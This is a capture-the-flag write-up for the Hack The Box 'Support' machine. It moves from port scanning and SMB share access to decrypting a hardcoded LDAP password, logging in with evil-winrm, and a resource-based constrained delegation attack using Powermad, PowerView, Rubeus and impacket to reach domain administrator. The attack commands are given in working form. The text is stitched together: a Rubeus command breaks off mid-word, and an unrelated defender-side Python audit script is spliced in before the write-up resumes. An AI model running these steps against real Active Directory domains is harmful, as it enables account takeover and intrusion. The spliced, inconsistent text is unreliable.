HacktheBox Support Write-up

Support.htb

Nmap Scan

nmap -sC -sV -Pn -oN support 10.10.11.174
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-08 02:59:21Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumerate Port 53

dig any support.htb @10.10.11.174

Located dc.support.htb and hostmaster.support.htb


Enumerate Ports 135/593

python3 rpcclient.py -U "" -N 10.10.11.174


\pipe\atsvc – Task Scheduler, used to remotely execute commands

Protocol: N/A 
Provider: N/A 
UUID    : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.11.174[49667]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[LRPC-2ff956068ca6c25e01]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: schedsvc.dll 
UUID    : 86D35949-83C9-4044-B424-DB363231FD0C v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.11.174[49667]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[LRPC-2ff956068ca6c25e01]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: taskcomp.dll 
UUID    : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0 
Bindings: 
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[LRPC-2ff956068ca6c25e01]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: taskcomp.dll 
UUID    : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0 
Bindings: 
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[LRPC-2ff956068ca6c25e01]

\pipe\lsass

Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol 
Provider: samsrv.dll 
UUID    : 12345778-1234-ABCD-EF00-0123456789AC v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.11.174[49664]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\DC[\pipe\lsass]


Enumerate Ports 139/445

MSFCONSOLE

msf> use auxiliary/scanner/smb/smb_version
msf> set rhost 10.0.0.3
msf> run

smbclient -N -L //10.10.11.174

smbclient -N //10.10.11.174/support-tools


.Net Debug w/dnSpy

I opened Commando VM, connected to the share, downloaded UserInfo.exe.zip, extracted the .exe, and opened it in dnSpy.

Encrypted Key

armando:0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E

To decrypt the key I chose to convert the encryption code to Python.

Decrypt.py

import base64

# values recovered from UserInfo.exe in dnSpy
enc_pass = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"

# the binary base64-decodes the stored string, then XORs each byte with the
# repeating key and the constant 223 (0xDF); XOR is its own inverse, so the
# same loop decrypts
array = base64.b64decode(enc_pass)
array2 = []

for i in range(len(array)):
    array2.append(chr(array[i] ^ key[i % len(key)] ^ 223))

print(''.join(array2))


Decrypted Key

armando:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz


Enumerate LDAP with decrypted credentials

ldapsearch -x -H ldap://support.htb -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=support,DC=htb"


Found Users and Credentials in NOTE

support:Ironside47pleasure40Watchful

Users: ldap, smith.rosario, hernandez.stanley, wilson.shelby, anderson.damian, thomas.raphael, levine.leopoldo, raven.clifton, bardot.mary, cromwell.gerard, monroe.david, west.laura, langley.lucy, daughtlet.mabel, stoll.rachelle, ford.victoria, Administrator

Evil-winrm

evil-winrm -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful

Bloodhound and Neo4j

# start neo4j
sudo start neo4j

# start bloodhound
bloodhound

# upload SharpHound.exe through the evil-winrm session
upload SharpHound.exe
# run SharpHound on the box
.\SharpHound.exe
# download the collector output through evil-winrm
download /Temp/sharphound.zip ~/Documents/hackthebox/support/sharphound.zip
# drag and drop the zip into BloodHound



Locate the user support@support.htb and check its groups with “Group Membership -> First Degree Group Memberships”.

Of the 3 groups, only “Shared Support Accounts@support.htb” has “Reachable High Value Targets”, so I mark Shared Support Accounts as owned, then open the “Analysis” tab and run “Shortest Path from Owned Principals -> support.htb -> Shared Support Accounts”, which leads to GenericAll over the domain controller DC.SUPPORT.HTB.

Right-clicking on GenericAll, selecting Help and opening the “Abuse Info” tab gives instructions on exploitation, which are pasted below.

evil-winrm -s ~/Tools/privesc/windows/PowerSploit-3.0.0/Recon/ -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful

In order to run the commands below I had to download Powermad.ps1 and a newer PowerView.ps1 and put them in the Recon folder so they were available after I connected with evil-winrm.

Pulled from Abuse Info in bloodhound

Full control of a computer object can be used to perform a resource based constrained delegation attack. Abusing this primitive is currently only possible through the Rubeus project. First, if an attacker does not control an account with an SPN set, Kevin Robertson’s Powermad project can be used to add a new attacker-controlled computer account:

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)


PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account:

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid


We now need to build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE:

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we’re taking over, again using PowerView in this case:

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}


We can then use Rubeus to hash the plaintext password into its RC4_HMAC form:

Rubeus.exe hash /password:Summer2018!

And finally we can use Rubeus’ s4u module to get a service ticket for the service name (sname) we want to “pretend” to be “admin” for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER:

../Downloads/Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:administrator /msdsspn:cifs/atta
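As an added, defender-side example (not part of this write-up or of BloodHound's Abuse Info text): the value that the Set-DomainObject step above writes into msDS-AllowedToActOnBehalfOfOtherIdentity is a self-relative binary security descriptor. The Python below builds one with the same structure (header, owner SID, DACL with a single access-allowed ACE carrying the SDDL mask CCDCLCSWRPWPDTLOCRSDRCWDWO) for a constructed machine-account SID, then parses the DACL back out, which is what an audit of that attribute on domain controllers does to spot a machine account that should not be allowed to act on behalf of others. All SIDs and the approved list are constructed values; ACL revision 2 is an assumption of the builder only.

```python
import struct
# Constructed sample values, not SIDs from the box.
ATTACKER_SID = "S-1-5-21-1677581083-3380853377-188903654-5101"
OWNER_SID = "S-1-5-32-544"  # BUILTIN\Administrators, the "O:BA" in the page's SDDL
FULL_CONTROL = 0x000F01FF   # access mask spelled CCDCLCSWRPWPDTLOCRSDRCWDWO in SDDL

def sid_to_bytes(sid):
    """Encode 'S-1-5-21-...' into the binary SID layout used inside an ACE."""
    parts = sid.split("-")
    rev, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", rev, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def bytes_to_sid(data, off):
    """Decode a binary SID at offset off; return (sid_string, byte_length)."""
    rev, count = struct.unpack_from("<BB", data, off)
    authority = int.from_bytes(data[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(map(str, subs))), 8 + 4 * count

def build_allow_sd(principal_sid):
    """Self-relative SD: owner SID plus a DACL with one ACCESS_ALLOWED ACE (assumed ACL revision 2)."""
    sid_b = sid_to_bytes(principal_sid)
    ace = struct.pack("<BBHI", 0x00, 0x00, 8 + len(sid_b), FULL_CONTROL) + sid_b
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(ace), 1, 0) + ace  # revision, sbz1, size, count, sbz2
    owner = sid_to_bytes(OWNER_SID)
    # revision 1, control = SE_SELF_RELATIVE | SE_DACL_PRESENT, then owner/group/SACL/DACL offsets
    hdr = struct.pack("<BBHIIII", 1, 0, 0x8004, 20, 0, 0, 20 + len(owner))
    return hdr + owner + acl

def allowed_to_act_principals(sd):
    """SIDs granted by ACCESS_ALLOWED ACEs in the DACL of an msDS-AllowedToActOnBehalfOfOtherIdentity value."""
    control = struct.unpack_from("<H", sd, 2)[0]
    dacl_off = struct.unpack_from("<I", sd, 16)[0]
    if not control & 0x0004 or dacl_off == 0:  # no DACL present: nobody may delegate
        return []
    ace_count = struct.unpack_from("<H", sd, dacl_off + 4)[0]
    off, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == 0x00:  # ACCESS_ALLOWED_ACE_TYPE; SID follows the 4-byte header and 4-byte mask
            sids.append(bytes_to_sid(sd, off + 8)[0])
        off += ace_size
    return sids

def unexpected_delegators(sd, approved):
    """Audit check: principals allowed to delegate to this computer that are not on the approved list."""
    return [s for s in allowed_to_act_principals(sd) if s not in approved]
```

Reading the attribute for each domain controller over LDAP and passing the raw bytes to unexpected_delegators is the audit; a DC normally carries no entries here at all, so any result is worth an alert.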

I used getST to grab the TGT in .ccache format to use with smbexec.py

impacket-getST support.htb/attackersystem -dc-ip dc.support.htb -impersonate administrator -spn www/dc.support.htb

Password prompt: Summer2018!


Export ccache

export KRB5CCNAME=administrator.ccache


IMPACKET-SMBEXEC with -k flag set

impacket-smbexec support.htb/administrator@dc.support.htb -no-pass -k



At this point I’m able to type the flag

type C:\Users\Administrator\Desktop\root.txt